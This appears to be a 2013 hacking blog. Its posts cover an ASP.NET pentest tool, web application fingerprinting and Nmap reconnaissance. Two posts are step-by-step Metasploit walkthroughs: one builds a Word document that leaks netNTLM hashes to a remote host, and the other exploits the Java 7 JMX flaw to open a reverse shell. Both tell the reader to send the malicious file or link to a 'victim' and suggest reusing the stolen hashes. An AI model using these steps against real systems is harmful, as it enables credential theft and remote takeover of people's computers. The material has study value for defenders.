Sunday, March 24, 2013

ASP.NET web-application Testing

Lens is an open-source ethical hacking tool specialized for penetration testing of ASP.NET web applications. Lens is written in WPF 4, and its internal modular architecture allows us to easily add new tests to the system.

You can download the source code from the following website.

http://ethicalhackingaspnet.codeplex.com/releases/view/52623

Currently the following tests are available:
(1) Viewstate eavesdropping & information disclosure

(2) Session Fixation

(3) Oracle Padding


Tuesday, March 19, 2013

Web-application Fingerprinting



Methods of Web Application Fingerprinting

Historically, identifying open-source applications has been easier because their behavior patterns and source code are publicly available. In the early days, web application identification was as simple as looking in the page footer for text like “Powered by <XYZ>”. However, as more server admins became aware of this, pen testers' approaches to identifying the web application running on a remote machine became more complex.

HTML Data Inspection

This is the simplest method. The manual approach is to open the site in a browser and look at its source code. In the automated approach, your tool connects to the site, downloads the page, and then runs some basic regular expression patterns that give a yes-or-no result. Basically, what we are looking for is a unique pattern specific to the web software. Examples of such patterns are:

1) WordPress
Meta Tag Folder Names
Folder Names in Link section
Evergreen notice at the bottom

2) OWA
URL pattern: http://<site_name>/OWA/

3) Joomla
URL pattern: http://<site_name>/component/

Friday, March 8, 2013

Microsoft Word UNC Path Injector

This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed, the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007 and 2010 as of January 2013. In order to get the hashes, the auxiliary/server/capture/smb module can be used.

First hack the victim PC using Metasploit.

msfconsole

use auxiliary/docx/word_unc_injector

msf exploit (word_unc_injector)>set lhost 192.168.1.2 (IP of Local Host)

msf exploit (word_unc_injector)>exploit

The malicious docx file has now been generated. It is stored on your local computer at:

/root/.msf4/local/msf.docx

Now use the 'upload' command to upload msf.docx to the victim PC:

upload /root/.msf4/local/msf.docx

Now use auxiliary/server/capture/smb

msf exploit (smb)>run

When the victim opens the msf.docx file, you will get the password hash. After getting the victim's password hashes, you can try to connect to another victim using the same password.

Sunday, March 3, 2013

Hack Remote P.C. using latest java vulnerability

JAVA APPLET JMX REMOTE CODE EXECUTION:-

This vulnerability was exploited in February 2013. Additionally, this module bypasses the default security settings introduced in Java 7 Update 10 to run an unsigned applet without displaying any warning to the user.

Any OS running Java 7 Update 10 is exploitable. The attacker only requires Metasploit.

Open your terminal and type the following commands:

msfconsole
use exploit/windows/browser/java_jre17_jmxbean_2
msf exploit (java_jre17_jmxbean_2)>set payload java/shell_reverse_tcp
msf exploit (java_jre17_jmxbean_2)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (java_jre17_jmxbean_2)>set srvhost 192.168.1.7 (This must be an address on the local machine)
msf exploit (java_jre17_jmxbean_2)>set uripath / (The Url to use for this exploit)
msf exploit (java_jre17_jmxbean_2)>exploit

Now give this URL to your victim: http://192.168.1.7:8080/
Send the link to the victim. As soon as he clicks it, you get a session. Type the following commands:

sessions -l
sessions -i 1

Now you have the victim's shell.

Friday, March 1, 2013

Use NMAP as an Information Gathering Tool

Usually we use NMAP as a port scanner to find the open ports of a web server, but with the help of NMAP scripts we can also gather information about the victim. In this tutorial we use NMAP to gather information.

(1) Use NMAP to determine the I.P. address of the victim: NMAP includes two scripts in its database.
nmap --script ip-geolocation-* host-name

As we can see, it shows the coordinates and location of our target.

(2) Use NMAP as a Whois tool: the following command is used to find whois information about the victim.
nmap --script whois host-name

